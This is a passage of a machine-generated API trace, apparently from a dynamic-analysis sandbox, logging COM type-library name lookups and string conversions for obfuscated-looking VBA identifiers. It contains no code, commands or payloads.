ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.420] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.420] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80926 | out: _Dst=0x67c2d40) returned 0x0 [0069.420] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vXCAQ_A") returned 0x1022d0 [0069.420] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_vXCAQ_A" | out: _Dst="_B_var_vXCAQ_A") returned 0x0 [0069.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_vXCAQ_A") returned 15 [0069.420] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.420] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vXCAQ_A", lHashVal=0x1022d0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.420] IUnknown:Release (This=0x665ba50) returned 0xd [0069.420] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.420] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vXCAQ_A", lHashVal=0x1022d0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.420] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.420] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.420] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vXCAQ_A", lHashVal=0x1022d0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.420] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.421] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.421] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vXCAQ_A", lHashVal=0x1022d0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.421] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.421] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.421] IUnknown:Release (This=0x665ba50) returned 0xd [0069.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12a4e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_vXCAQ_A") returned 15 [0069.421] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vXCAQ_A", lHashVal=0x1022d0, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0069.421] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80926 | out: _Dst=0x144ec0) returned 0x0 [0069.421] ITypeComp:RemoteBind (in: This=0x665ba60, szName="TUAoAADQ", lHashVal=0x104991, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a16, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TUAoAADQ") returned 9 [0069.421] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="TUAoAADQ", lHashVal=0x104991, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a16, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TUAoAADQ") returned 9 [0069.421] ITypeComp:RemoteBind (in: This=0x665bd30, szName="TUAoAADQ", lHashVal=0x104991, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.421] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TUAoAADQ") returned 0x104991 [0069.421] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="TUAoAADQ" | out: _Dst="TUAoAADQ") returned 0x0 [0069.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="TUAoAADQ") returned 9 [0069.421] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.421] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="TUAoAADQ", lHashVal=0x104991, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.421] IUnknown:Release (This=0x665ba50) returned 0xd [0069.421] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.422] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="TUAoAADQ", lHashVal=0x104991, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.422] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.422] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.422] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="TUAoAADQ", lHashVal=0x104991, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.422] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.422] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.422] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="TUAoAADQ", lHashVal=0x104991, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.422] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a16, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TUAoAADQ") returned 9 [0069.422] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="TUAoAADQ", lHashVal=0x104991, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.422] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.422] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80a16 | out: _Dst=0x67c2d40) returned 0x0 [0069.422] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_TUAoAADQ") returned 0x10211a [0069.422] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_TUAoAADQ" | out: _Dst="_B_var_TUAoAADQ") returned 0x0 [0069.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_TUAoAADQ") returned 16 [0069.422] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.422] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_TUAoAADQ", lHashVal=0x10211a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.422] IUnknown:Release (This=0x665ba50) returned 0xd [0069.422] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.422] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_TUAoAADQ", lHashVal=0x10211a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.422] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.422] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.422] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_TUAoAADQ", lHashVal=0x10211a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.422] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.422] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.423] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_TUAoAADQ", lHashVal=0x10211a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.423] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.423] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.423] IUnknown:Release (This=0x665ba50) returned 0xd [0069.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12a7e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_TUAoAADQ") returned 16 [0069.423] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_TUAoAADQ", lHashVal=0x10211a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0) returned 0x0 [0069.423] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80a16 | out: _Dst=0x144ec0) returned 0x0 [0069.423] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iDAAxoU", lHashVal=0x1042d3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b809ee, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iDAAxoU") returned 8 [0069.423] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iDAAxoU", lHashVal=0x1042d3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b809ee, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iDAAxoU") returned 8 [0069.423] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iDAAxoU", lHashVal=0x1042d3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.423] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iDAAxoU") returned 0x1042d3 [0069.423] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="iDAAxoU" | out: _Dst="iDAAxoU") returned 0x0 [0069.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="iDAAxoU") returned 8 [0069.423] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.423] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iDAAxoU", lHashVal=0x1042d3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.423] IUnknown:Release (This=0x665ba50) returned 0xd [0069.423] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.423] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iDAAxoU", lHashVal=0x1042d3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.423] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.424] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.424] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iDAAxoU", lHashVal=0x1042d3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.424] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.424] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.424] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iDAAxoU", lHashVal=0x1042d3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.424] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b809ee, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iDAAxoU") returned 8 [0069.424] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iDAAxoU", lHashVal=0x1042d3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.424] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.424] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b809ee | out: _Dst=0x67c2d40) returned 0x0 [0069.424] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iDAAxoU") returned 0x104657 [0069.424] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_iDAAxoU" | out: _Dst="_B_var_iDAAxoU") returned 0x0 [0069.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_iDAAxoU") returned 15 [0069.424] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.424] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iDAAxoU", lHashVal=0x104657, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.424] IUnknown:Release (This=0x665ba50) returned 0xd [0069.424] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.424] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iDAAxoU", lHashVal=0x104657, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.424] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.424] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.424] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iDAAxoU", lHashVal=0x104657, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.424] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.424] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.424] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iDAAxoU", lHashVal=0x104657, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.424] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.424] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.424] IUnknown:Release (This=0x665ba50) returned 0xd [0069.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12aae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_iDAAxoU") returned 15 [0069.424] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iDAAxoU", lHashVal=0x104657, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0) returned 0x0 [0069.425] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b809ee | out: _Dst=0x144ec0) returned 0x0 [0069.425] ITypeComp:RemoteBind (in: This=0x665ba60, szName="AkkxUQA4", lHashVal=0x10b8a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a42, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="AkkxUQA4") returned 9 [0069.425] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="AkkxUQA4", lHashVal=0x10b8a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a42, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="AkkxUQA4") returned 9 [0069.425] ITypeComp:RemoteBind (in: This=0x665bd30, szName="AkkxUQA4", lHashVal=0x10b8a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.425] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AkkxUQA4") returned 0x10b8a3 [0069.425] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="AkkxUQA4" | out: _Dst="AkkxUQA4") returned 0x0 [0069.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="AkkxUQA4") returned 9 [0069.425] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.425] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="AkkxUQA4", lHashVal=0x10b8a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.425] IUnknown:Release (This=0x665ba50) returned 0xd [0069.425] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.425] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="AkkxUQA4", lHashVal=0x10b8a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.425] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.425] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.425] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="AkkxUQA4", lHashVal=0x10b8a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.425] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.425] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.425] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="AkkxUQA4", lHashVal=0x10b8a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.425] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a42, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="AkkxUQA4") returned 9 [0069.426] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="AkkxUQA4", lHashVal=0x10b8a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.426] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.426] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80a42 | out: _Dst=0x67c2d40) returned 0x0 [0069.426] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AkkxUQA4") returned 0x10902c [0069.426] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="bCGC_D4", cchCount1=-1, lpString2="_B_var_AkkxUQA4", cchCount2=-1) returned 3 [0069.426] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_AkkxUQA4" | out: _Dst="_B_var_AkkxUQA4") returned 0x0 [0069.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_AkkxUQA4") returned 16 [0069.426] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.426] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_AkkxUQA4", lHashVal=0x10902c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.426] IUnknown:Release (This=0x665ba50) returned 0xd [0069.426] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.426] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_AkkxUQA4", lHashVal=0x10902c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.426] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.426] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.426] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_AkkxUQA4", lHashVal=0x10902c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.426] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.426] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.426] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_AkkxUQA4", lHashVal=0x10902c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.426] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.426] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.426] IUnknown:Release (This=0x665ba50) returned 0xd [0069.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12ade, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_AkkxUQA4") returned 16 [0069.426] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_AkkxUQA4", lHashVal=0x10902c, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x55007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x55007800000000, pDummy=0x0) returned 0x0 [0069.426] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80a42 | out: _Dst=0x144ec0) returned 0x0 [0069.426] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KAABQAG", lHashVal=0x101c6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a6e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KAABQAG") returned 8 [0069.427] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KAABQAG", lHashVal=0x101c6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a6e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KAABQAG") returned 8 [0069.427] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KAABQAG", lHashVal=0x101c6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.427] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAABQAG") returned 0x101c6d [0069.427] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="KAABQAG" | out: _Dst="KAABQAG") returned 0x0 [0069.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="KAABQAG") returned 8 [0069.427] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.427] 